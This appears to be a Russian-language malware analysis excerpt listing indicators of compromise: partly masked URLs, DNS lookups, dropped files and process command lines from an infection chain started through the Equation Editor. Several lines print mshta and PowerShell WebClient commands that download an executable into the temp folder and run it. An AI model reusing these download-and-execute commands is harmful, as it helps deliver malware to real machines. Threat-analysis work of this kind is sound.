Техническая информация
- http://vi###mania.eu/wp/joyk.exe как %temp%\yk.exe
- '%WINDIR%\syswow64\mshta.exe' http://bi#.ly/2RuxqY3 &AAAAAAAAAAAAAAAC
- %APPDATA%\microsoft\windows\cookies\user@bit[1].txt
- <LS_APPDATA>\microsoft\windows\<INETFILES>\content.ie5\caasbycl\yk[1].hta
- http://bi#.ly/2RuxqY3
- http://ne##ux.in/av/yk.hta
- http://vi###mania.eu/wp/joyk.exe
- DNS ASK bi#.ly
- DNS ASK ne##ux.in
- DNS ASK vi###mania.eu
- '%WINDIR%\syswow64\mshta.exe' http://bi#.ly/2RuxqY3 &AAAAAAAAAAAAAAAC' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('http://vi###mania.eu/wp/joyk.exe','%temp%\yk.exe'); Start '%temp%\yk.exe'' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\cmd.exe' /c powershell (new-object System.Net.WebClienT).DownloadFile('http://vi###mania.eu/wp/joyk.exe','%temp%\yk.exe'); Start '%temp%\yk.exe'